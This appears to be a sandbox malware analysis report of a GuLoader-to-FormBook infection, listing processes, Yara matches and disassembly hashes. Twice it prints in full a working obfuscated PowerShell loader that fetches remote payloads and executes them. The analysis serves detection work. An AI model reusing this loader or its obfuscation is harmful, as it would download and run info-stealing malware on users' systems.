                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:09:31:16
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;"
                                                                      Imagebase:0x7ff7be880000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2374208348.0000019E36F60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:09:31:16
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:09:31:29
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;"
                                                                      Imagebase:0x370000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2667645676.000000000A5A8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2640784157.0000000005C28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:09:31:29
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff6d64d0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:09:31:58
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                      Imagebase:0xdb0000
                                                                      File size:59'904 bytes
                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3185715994.0000000021E50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3186142733.0000000022E10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.3167965625.00000000054F8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:09:32:44
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe"
                                                                      Imagebase:0xc00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3467940169.00000000033A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:12
                                                                      Start time:09:32:46
                                                                      Start date:22/10/2024
                                                                      Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                      Imagebase:0xa50000
                                                                      File size:17'408 bytes
                                                                      MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3468043368.0000000003380000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:13
                                                                      Start time:09:33:00
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe"
                                                                      Imagebase:0xc00000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3467347887.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:14
                                                                      Start time:09:33:14
                                                                      Start date:22/10/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff79f9e0000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:false

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FF848A7B136 Relevance: .5, Instructions: 458COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a99d53b9f9665261dd367788ce0cd396c9ee157a2dd46714cd85e7ec73af91
                                                                        • Instruction ID: 90b9db952fe6cd1f8100b54d008dc35434077f706bf579ed26923bcc2431de11
                                                                        • Opcode Fuzzy Hash: 06a99d53b9f9665261dd367788ce0cd396c9ee157a2dd46714cd85e7ec73af91
                                                                        • Instruction Fuzzy Hash: E8E1A27090DA4D8FEBA8EF28C8567F937E1FF54350F00826AE84DC7691CB7499458B86
                                                                        Function 00007FF848A7BEFB Relevance: .4, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2382447871.00007FF848A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A70000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848a70000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7cf45172f6b72ddaaf72e423a34acd35726f4a46be79536c525ba389c9fa55ca
                                                                        • Instruction ID: 6e38f93a1c1f87dffb2eab68665faef2bfebff7908e4653c8f9f6fff65b32842
                                                                        • Opcode Fuzzy Hash: 7cf45172f6b72ddaaf72e423a34acd35726f4a46be79536c525ba389c9fa55ca
                                                                        • Instruction Fuzzy Hash: 63E19130A09A4D8FEBA8EF28D8567F977D1FB54350F00423AE80DC7295DF7899458B86
                                                                        Function 00007FF848B4566D Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2383024035.00007FF848B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_7ff848b40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 66
                                                                        • API String ID: 0-3205838671
                                                                        • Opcode ID: e1edd61da12df6217ed264ad3103587ab8f742b52694dd4ba4fdaca62edde71f
                                                                        • Instruction ID: 3800e0b63a1832360f7d99f5c15fbba47245951ac47ebe3da9f1b81a4ac539e4
                                                                        • Opcode Fuzzy Hash: e1edd61da12df6217ed264ad3103587ab8f742b52694dd4ba4fdaca62edde71f
                                                                        • Instruction Fuzzy Hash: 85B12331E0EF8A4FE799EB2858565B97BE0EF566A0F0841FBD00DC7593DE189C048355
                                                                        Function 00007FF848B4A4AB Relevance: .5, Instructions: 482COMMON
                                                                        Download Yara Rule
